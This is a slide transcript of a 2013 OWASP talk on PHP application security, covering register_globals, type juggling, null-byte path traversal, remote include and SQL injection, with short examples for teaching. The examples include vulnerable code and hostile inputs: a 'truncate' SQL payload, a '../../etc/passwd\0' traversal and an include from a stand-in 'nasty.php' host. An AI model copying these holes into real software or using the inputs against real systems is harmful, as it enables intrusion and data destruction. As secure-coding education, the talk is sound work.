PHP and Application Security - OWASP Road Show 2013
Presentation on information security in the context of PHP programming: the main pitfalls when programming in PHP, and the context of PHP's usage and evolution.

Video of the presentation: http://youtu.be/NTc5cZKZGF0

PHP and Application Security - OWASP Road Show 2013 Presentation Transcript

  • 1. Follow this topic: @rjsmelo
    PHP and Application Security
    #owasp #php #appsec
    RICARDO MELO
  • 2. @rjsmelo
    RICARDO MELO
    ● CTO @ DRI
    ● PHP, MySQL, Linux and lots of other OSS
    ● ZCE, RHCE, LPI 3, ITIL, etc.
  • 3. 1999 - 2013 DRI. Some rights reserved.
    Outline
    ● PHP Context
    ● Pain points
    ● Resources
  • 4. OWASP - Builders, Breakers and Defenders
    ● Builders - https://www.owasp.org/index.php/Builders
    ● Breakers - https://www.owasp.org/index.php/Breakers
    ● Defenders - https://www.owasp.org/index.php/Defenders
  • 5. What's PHP?
    ● PHP is a programming language.
    ● It was born as "Personal Home Page", but nowadays it is one of the most popular programming languages on/for the internet.
    ● It has moved away from its roots and changed its name to PHP: Hypertext Preprocessor.
  • 6. PHP Anatomy
    ● The language "core" (the ifs and elses)
    ● The "official" libraries of functions (extensions)
    ● All the rest:
      – PEAR
      – PECL
      – Composer
      – OSS libraries
  • 7. What Makes PHP Popular
    ● Low entry barrier
    ● Immediate results
    ● The "instantaneous reward" factor for the programmer
    ● Solves the problems it sets out to solve in a quick and effective way.
  • 8. In fact it has been defined as ...
    ● Rasmus Lerdorf (the creator of PHP):
      "PHP has never been just a scripting engine with some cool add-ons. PHP has always been the solution to the Web problem with even more bonus add-ons. And as I have said so many times, PHP is not about purity in CS principles or architecture, it is about solving the ugly web problem with an admittedly ugly, but extremely functional and convenient solution. If you are looking for purity you are in the wrong boat. Get out now before you get hit by a wet cat!"
  • 9. Ease of use?
    ● register_globals
    ● magic_quotes
    ● safe_mode
    ● open_basedir
  • 10. Myths and Legends of PHP
    ● PHP is insecure
    ● But <insert your language here> is secure
    ● Frameworks will solve all our security problems
  • 11. Myths and Legends of PHP (2)
    ● PHP is just for building some small sites.
    ● If you really want to build an enterprise website/portal/webapp/etc. then you must use <enter your language here>
  • 12. Information Security
    "Information security means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction" (http://en.wikipedia.org/wiki/Information_security)
  • 13. "Standard Approach"
    "[...] we need to improve the security of our software [...]"
    ● List of security flaws
      – OWASP Top 10
      – SANS Top 25
      – Valid for all programming languages and generic enough
    ● And a book: "Secure <your programming language>"
    ● Code review & pen test & ...
  • 14. Example: OWASP Top 10
    ● A1 - Injection
    ● A2 - Broken Authentication and Session Management
    ● A3 - Cross Site Scripting (XSS)
    ● A4 - Insecure Direct Object References
    ● A5 - Security Misconfiguration
    ● A6 - Sensitive Data Exposure
    ● A7 - Missing Function Level Access Control
    ● A8 - Cross-Site Request Forgery (CSRF)
    ● A9 - Using Components with Known Vulnerabilities
    ● A10 - Unvalidated Redirects and Forwards
  • 15. PHP and (in)Security
    ● "With great power comes great responsibility"
    ● The simplicity and flexibility of the language often gets programmers into trouble
    ● "Shared hosting" has brought the "all in the webroot" kind of application to the PHP world.
      – Remember: unless the server configuration says otherwise, all files are reachable directly from the internet.
  • 16. register_globals
    ● The classic...
    ● All parameters passed to the script (GET, POST, COOKIE, SERVER) end up as globals.
      // call: http://server/script.php?authorized=1
      // $authorized is never initialised, so the GET parameter supplies it
      if ( some_function_to_check($username, $password) ) {
          $authorized = 1;
      }
      if ( ! $authorized ) {
          exit;
      }
      // rest of the code
  • 17. $_REQUEST
    ● $_REQUEST was a quick fix for register_globals
    ● Uses the same processing order as register_globals
    ● Instead of registering globals, it registers "keys" on the $_REQUEST array
    ● Mixing GET and POST can foster XSRF and other problems.
    ● Most people recommend direct access to $_GET & $_POST to keep more control.
  • 18. Case Sensitive & Type Insensitive
    ● The first normally is not a problem...
    ● But type insensitivity brings some unexpected problems
      $country = "1 ; truncate world;";
      if ( $country > 0 ) {  // loose comparison: the leading "1" makes this true
          mysql_query("delete from world where country = {$country}");
      }
      echo (int)$country;    // 1
      echo (string)$country; // 1 ; truncate world;
  • 19. Type Juggling & Type Cast
    ● http://www.php.net/manual/en/language.types.type-juggling.php
      – Variable type is based on context
        ● If you add (+) then it is an int (or a float)
        ● If you use string concatenation (.) then it is a string
    ● But you can force it!
      – (int), (float), (string), (array), (object), (unset)
      – settype
      $country = "1 ; truncate world;";
      settype($country, "integer");
      echo (int)$country;    // 1
      echo (string)$country; // 1
  • 20. PHP strings and .... C strings
    ● PHP uses a great number of libraries ... written in C.
      – "\0" in PHP is one char like all the rest
      – But in C it means the end of the string
      $file = $_GET['file']; // "../../etc/passwd\0"
      if (file_exists("/home/wwwrun/" . $file . ".php")) {
          // file_exists will return true as the
          // file /home/wwwrun/../../etc/passwd exists
          include "/home/wwwrun/" . $file . ".php";
          // the file /etc/passwd will be included
      }
  • 21. Streams
    ● PHP uses streams to access "files".
    ● file:// - Accessing local filesystem
    ● http:// - Accessing HTTP(s) URLs
    ● ftp:// - Accessing FTP(s) URLs
    ● php:// - Accessing various I/O streams
    ● zlib:// - Compression streams
    ● data:// - Data (RFC 2397)
    ● glob:// - Find pathnames matching pattern
    ● phar:// - PHP Archive
    ● ssh2:// - Secure Shell 2
    ● rar:// - RAR
    ● ogg:// - Audio streams
    ● expect:// - Process interaction streams
  • 22. include / require
    ● include / require use streams, meaning that you can include / require via "http", "ftp", etc.
    ● Except if you disable allow_url_fopen
      // $_GET['theme_path'] => http://some-host.xpto/nasty.php?
      include "{$_GET['theme_path']}/header.inc";
  • 23. 1999 - 2013 DRI. Alguns direitos reservados. 23The trendy .inc● There was a trend of using .inc● Only supersede by the "rename" to.orig or .bak when doing live"debugging" directly on the servers● Normally if the file ends with “.php” thefile is processed by PHP, if itsnamed .inc or .orig is handled as aregular text file.
  • 24. 1999 - 2013 DRI. Alguns direitos reservados. 24SQL Injections and Mysql● Myth:– The mysql extension is vurnerable to SQL injection– To solve this you must use● Mysqli● PDO● Fact:– All extensions will allow you to do the queries that YOU want– So, there is the possibility do do SQL injection in all– The problem is between the chair and the keyboard– In fact they refer to using prepared statements.
  • 25. 1999 - 2013 DRI. Alguns direitos reservados. 25Session Magic● session_start()● It Just Works● Session Fixation– session.use_only_cookies (default 1 para o PHP5.3)– session_regenerate_id()
  • 26. 1999 - 2013 DRI. Alguns direitos reservados. 26Useful Resources● http://www.php.net● https://www.owasp.org/index.php/Top_Ten● https://www.owasp.org/index.php/Cheat_Sheets● https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet (wip)● https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project● https://www.owasp.org/index.php/OWASP_Guide_Project
  • 27. Follow this topic:@rjsmeloQA
  • 28. www.dri-global.com@rjsmeloricardo.melo@dri-global.com
  • 29. Thank you